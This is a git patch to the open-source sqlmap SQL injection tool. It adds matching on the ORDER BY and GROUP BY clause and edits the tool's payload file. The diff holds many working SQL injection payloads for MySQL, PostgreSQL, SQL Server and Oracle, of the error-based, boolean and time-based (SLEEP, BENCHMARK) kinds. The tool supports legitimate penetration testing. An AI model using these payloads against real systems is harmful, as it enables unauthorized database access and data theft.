From 4dec049c22695bf4ff505a6d1f517df3a415381b Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Fri, 3 Dec 2010 12:00:03 +0000 Subject: [PATCH] Major bug fix for test on ORDER BY and GROUP BY clauses. Minor bug fix to skip following tests if they do not match any of the clause previously identified (injection.clause value). --- lib/controller/checks.py | 18 +++++++++ lib/core/datatype.py | 1 + xml/payloads.xml | 80 +++++++++++++++------------------------- 3 files changed, 49 insertions(+), 50 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 22a8589a7..462c16d78 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -94,6 +94,7 @@ def checkSqlInjection(place, parameter, value): for test in conf.tests: title = test.title stype = test.stype + clause = test.clause # Skip test if the risk is higher than the provided (or default) # value @@ -145,6 +146,22 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue + # Skip test if it does not match the same SQL injection clause + # already identified by another test + # Parse test's + clauseMatch = False + + for clauseTest in clause: + if injection.clause is not None and clauseTest in injection.clause: + clauseMatch = True + break + + if clause != [ 0 ] and injection.clause and not clauseMatch: + debugMsg = "skipping test '%s' because the clause " % title + debugMsg += "differs from the clause already identified" + logger.debug(debugMsg) + continue + infoMsg = "testing '%s'" % title logger.info(infoMsg) @@ -340,6 +357,7 @@ def checkSqlInjection(place, parameter, value): injection.ptype = ptype injection.prefix = prefix injection.suffix = suffix + injection.clause = clause if "epayload" in test: epayload = "%s%s" % (test.epayload, comment) diff --git a/lib/core/datatype.py b/lib/core/datatype.py index 101b6315f..97b748b43 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -70,6 +70,7 @@ def injectionDict(): injection.ptype = None injection.prefix = None injection.suffix = None + injection.clause = None # data is a dict with stype as key and a tuple as value with # title, where, comment and reqPayload diff --git a/xml/payloads.xml b/xml/payloads.xml index 749950b56..bb30133e9 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -393,16 +393,6 @@ Formats: - - - 2 - 2,3 - 1,2 - 1 - , - - - @@ -604,16 +594,6 @@ Formats: -- - - - 2 - 2,3 - 1,2 - 1 - , - - -- - @@ -662,10 +642,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))
MySQL @@ -682,10 +662,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL @@ -701,10 +681,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server @@ -720,10 +700,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)
Oracle @@ -741,10 +721,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) @@ -1046,15 +1026,15 @@ Formats: - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (append) 2 3 0 2,3 1 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1066,15 +1046,15 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses + PostgreSQL error-based - GROUP BY and ORDER BY clauses (append) 2 3 0 2,3 1 - (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) - (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1085,15 +1065,15 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause + Microsoft SQL Server/Sybase error-based - ORDER BY clause (append) 2 3 0 3 1 - (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) - (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1104,15 +1084,15 @@ Formats: - Oracle error-based - ORDER BY clause + Oracle error-based - ORDER BY clause (append) 2 3 0 3 1 - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1123,7 +1103,7 @@ Formats: - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (replace) 2 4 0 @@ -1143,7 +1123,7 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses + PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace) 2 4 0 @@ -1162,7 +1142,7 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause + Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace) 2 4 0 @@ -1181,7 +1161,7 @@ Formats: - Oracle error-based - ORDER BY clause + Oracle error-based - ORDER BY clause (replace) 2 4 0 @@ -1437,7 +1417,7 @@ Formats: 5 1 1 - 1 + 1,2,3 1 AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) @@ -1457,7 +1437,7 @@ Formats: 5 2 1 - 1 + 1,2,3 1 AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) @@ -1525,7 +1505,7 @@ Formats: 5 2 3 - 1 + 1,2,3 1 OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) @@ -1545,7 +1525,7 @@ Formats: 5 3 3 - 1 + 1,2,3 1 OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))